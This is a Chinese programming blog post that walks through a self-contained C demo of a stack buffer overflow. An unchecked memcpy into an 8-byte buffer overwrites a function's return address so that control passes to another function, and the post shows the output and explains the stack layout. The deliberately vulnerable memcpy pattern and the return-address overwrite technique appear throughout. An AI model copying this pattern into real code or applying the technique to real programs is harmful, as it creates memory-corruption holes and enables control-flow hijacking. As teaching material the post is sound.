欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

堆栈溢出:修改函数返回地址

程序员文章站 2022-03-27 14:22:27
...

利用函数堆栈溢出,修改函数返回地址,进而调用别的函数。

 

测试环境:

win10 x86-64

gcc: x86_64-pc-cygwin

 

 

代码

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int len;
typedef void ( * p_fun)(void);


void fun(const char* input, int size)
{
    char buf[8];

    memcpy(buf, input, size);
    printf("\nAddress of param=%p\n",&input);
    printf("Address of ret=%p\n",*(&input-1));
    printf("Address of local value=%p\n",buf);

    len=(long)&input-(long)buf;    //计算从local variable到fun param的长度
    printf("i am in fun\n");
}

void bad_fun()
{
    printf("\nok, i did it.\n");
}


int main(int argc, char* argv[])
{
    int addr[8] = {0};
    char s[] = "cal len";
    long go = (long)bad_fun;
    char ss[100] = {0};


    fun(s, sizeof(s));
  
     //((p_fun)go)();
    printf("len = %d\n", len);

    printf("Address of fun=%p\n", fun);
    printf("Address of bad_fun=%p\n", bad_fun);
    printf("Address of go=%lx\n", go);

    //把bad_fun()函数的地址分离成字节, 然后储存到ss中
    addr[0]=(go >> 0) & 0xff; addr[1]=(go >> 8) & 0xff; addr[2]=(go >> 16) & 0xff;  addr[3]=(go >> 24) & 0xff;
    addr[4]=(go >> 32) & 0xff; addr[5]=(go >> 40) & 0xff; addr[6]=(go >> 48) & 0xff;  addr[7]=(go >> 56) & 0xff;
    for(int j=0;j<8;j++)
    {
        ss[len-j-1]=addr[7-j];
    }
    
    fun(ss, len);
    printf("test end.\n");    //由于函数返回地址被修改,此代码不被执行
    return 0;
}

 

执行结果:

λ .\a.exe

Address of param=0xffffcb10
Address of ret=0x10040120c
Address of local value=0xffffcaf8
i am in fun
Address of fun=0x1004010e0
Address of bad_fun=0x10040116d
Address of go=10040116d

Address of param=0xffffcb10
Address of ret=0x10040116d
Address of local value=0xffffcaf8
i am in fun

ok, i did it.

可见看到通过对fun函数返回地址的修改,成功执行了bad_fun()

 

分析:

1)要实现本功能主要要实现以下两点:

  • 计算fun函数入参input到fun局部变量buf的长度(字节),由此便可以知道返回返回地址相对于buf的偏移,因为ret地址就在函数入参input的下方

  • 利用buf数组来修改ret地址

2)测试系统为小端模式

3)测试系统为64位,所以需要注意函数地址为64位(8字节长),而不是32位。另外寄存器也是8字节长。

4)堆栈结构如下

堆栈溢出:修改函数返回地址

 

 

 

 

相关标签: c stack